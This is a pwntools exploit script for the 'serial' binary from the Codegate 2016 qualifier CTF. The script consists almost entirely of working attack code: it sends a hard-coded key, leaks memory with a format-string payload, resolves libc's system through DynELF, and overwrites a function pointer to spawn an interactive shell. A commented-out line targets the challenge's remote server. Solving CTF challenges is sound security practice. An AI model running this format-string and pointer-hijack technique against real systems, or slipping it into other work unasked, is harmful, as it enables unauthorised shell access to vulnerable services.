Exploit for serial from Codegate quals 2016

doit_serial.py

from pwn import *

e = ELF("./serial")

#r = remote("175.119.158.133", 23232)
r = process("./serial")

r.recvuntil("input product key:")
r.sendline("615066814080")

@MemLeak
def leak(addr):
    r.recvuntil("choice >> ")
    r.sendline("1")
    r.sendline("BB%13$sCC".ljust(24) + p64(e.plt["printf"]))
    r.sendline("3AAAAAAA"+p64(addr))
    r.sendline("2\n0")
    r.recvuntil("BB")

    data = r.recvuntil("CC")[:-2] + "\x00"

    r.recvuntil("choice >> ")
    return data

d = DynELF(leak, elf = e)
system = d.lookup("system", "libc.so")

r.recvuntil("choice >> ")
r.sendline("1")
r.sendline("sh;".ljust(24) + p64(system))
r.sendline("3")

r.clean()
r.interactive()